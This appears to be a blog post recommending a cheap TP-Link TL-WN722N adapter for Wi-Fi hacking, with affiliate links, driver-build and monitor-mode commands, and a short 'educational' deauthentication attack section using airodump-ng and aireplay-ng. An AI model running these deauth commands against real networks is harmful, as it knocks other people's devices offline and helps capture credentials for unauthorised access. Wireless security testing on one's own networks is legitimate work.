Wi-fi adopter for H4ck1Ng

Best budget wi-fi adopter under 1000rs for hacking


TP-Link TL-WN722N[version 2] installation and monitor mode



click this link for installation video

use the link to buy TP -Link TL-WN722N 150Mbps Wireless USB Adapter.

Amazon: TP-Link-TL-WN722N-150Mbps-Wireless-AdapterFlipkart: tp-link-tl-wn722n-high-gain-wireless-usb-adapter

Download kali 2020 customized by zsecurity


This section for commands given by Techie singh,

If u find any problems while executing the commands... Please feel free to contact me on instagram with screenshots I will help you out 😊"These commands for Linux base only" commandssudo apt update sudo apt install bc sudo rmmod r8188eu.ko git clone https://github.com/aircrack-ng/rtl8188eus cd rtl8188eus sudo -i echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf" exit make sudo make install sudo modprobe 8188eu To enable Monitor mode ifconfig wlan0 down airmon-ng check kill iwconfig wlan0 mode monitor ifconfig wlan0 up iwconfig \\check mode: monitor Deauthentication Attack[for educational purpose only] airodump-ng wlan0 airodump-ng --bssid <id> --channel <ch> --write test wlan0 aireplay-ng --deauth [any no.] -a <bssid> -c <station id> wlan0Important note: If after restarting your kali machine doesn't recognise your device..As lot of people are facing the same problem ..I have a solution for you..Whenever you restart your kali OSInsert the adapter and run the commandsudo rmmod r8188eu.ko Sudo modprobe 8188euDisconnect the device and connect again..Then check.